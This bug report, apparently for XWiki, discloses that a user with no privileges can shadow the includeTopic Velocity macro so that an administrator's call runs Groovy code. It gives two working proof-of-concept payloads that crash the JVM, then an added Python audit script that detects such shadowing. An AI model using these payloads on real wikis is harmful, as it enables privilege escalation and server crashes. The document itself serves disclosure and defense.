Description
This is a particular pain because I don't see an easy fix at the moment.
This was alluded to in XWIKI-4934 but I wanted it listed here so it's not lost.
To repeat:
1. Create a user with no privileges.
2. Log in as this user and write the following in his user page (edit in wiki mode):
{{velocity}}
#macro(includeTopic, $unused)
#set($script = 'public static crash() {new Random().unsafe.putAddress(0,0);}')
#set($obj = $xcontext.getContext().getWiki().parseGroovyFromString($script, $xcontext.getContext()))
$obj.crash()
#end
{{/velocity}}
3. As an administrator, try to invoke an includeTopic macro.
4. Segfault.
A variation on this is to write a macro which outputs code that will then run. This variation is immune to attempts to test where the macro resides because the macro does nothing requiring privileges; it only outputs code which is then parsed in the privileged page.
{{velocity}}
#macro(includeTopic, $unused)
#set($dsqb = '{{')
${dsqb}groovy}}
new Random().unsafe.putAddress(0,0);
${dsqb}/groovy}}
#end
{{/velocity}}
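Added example, not part of the original report and not XWiki code: an audit sketch that flags pages saved by unprivileged authors which define a macro with a name that privileged pages call. It keys on the definition name only, so it covers both variations above. The page records, the field names (name, author, author_privileged, content) and the sample data are assumptions made for the illustration.

```python
import re

# Macro names that privileged pages call. Only includeTopic comes from the
# report above; the rest of the set is for the deployment to fill in.
PROTECTED_MACROS = {"includeTopic"}

# A Velocity macro definition: "#macro(name ..." with optional whitespace.
MACRO_DEF = re.compile(r"#macro\s*\(\s*([A-Za-z_][\w-]*)")

def find_shadowing(pages, protected=PROTECTED_MACROS):
    """Return (page, author, macro) for every protected macro name that is
    defined in a page saved by an unprivileged author.

    The body of the macro is deliberately ignored: the second variation in
    the report only emits text, so inspecting what the macro does (or where
    it lives at call time) would miss it. Comments are not stripped, so a
    commented-out definition is reported too; for an audit that is the
    safer direction to err in.
    """
    findings = []
    for page in pages:
        if page["author_privileged"]:
            continue
        for name in MACRO_DEF.findall(page["content"]):
            if name in protected:
                findings.append((page["name"], page["author"], name))
    return findings

# Constructed sample data (hypothetical page and user names, bodies elided).
SAMPLE_PAGES = [
    {"name": "XWiki.lowpriv", "author": "lowpriv", "author_privileged": False,
     "content": "{{velocity}} #macro(includeTopic, $unused) direct call #end {{/velocity}}"},
    {"name": "XWiki.lowpriv2", "author": "lowpriv2", "author_privileged": False,
     "content": "{{velocity}}\n#macro ( includeTopic $unused )\n#set($dsqb = '{{')\n${dsqb}groovy}} emitted text ${dsqb}/groovy}}\n#end\n{{/velocity}}"},
    {"name": "Main.Greeting", "author": "lowpriv", "author_privileged": False,
     "content": "{{velocity}} #macro(greet $who) Hello $who #end #greet('x') {{/velocity}}"},
    {"name": "XWiki.AdminMacros", "author": "Admin", "author_privileged": True,
     "content": "{{velocity}} #macro(includeTopic $topic) trusted body #end {{/velocity}}"},
]

if __name__ == "__main__":
    for page, author, macro in find_shadowing(SAMPLE_PAGES):
        print(f"{page}: unprivileged author {author!r} defines #{macro}")
```
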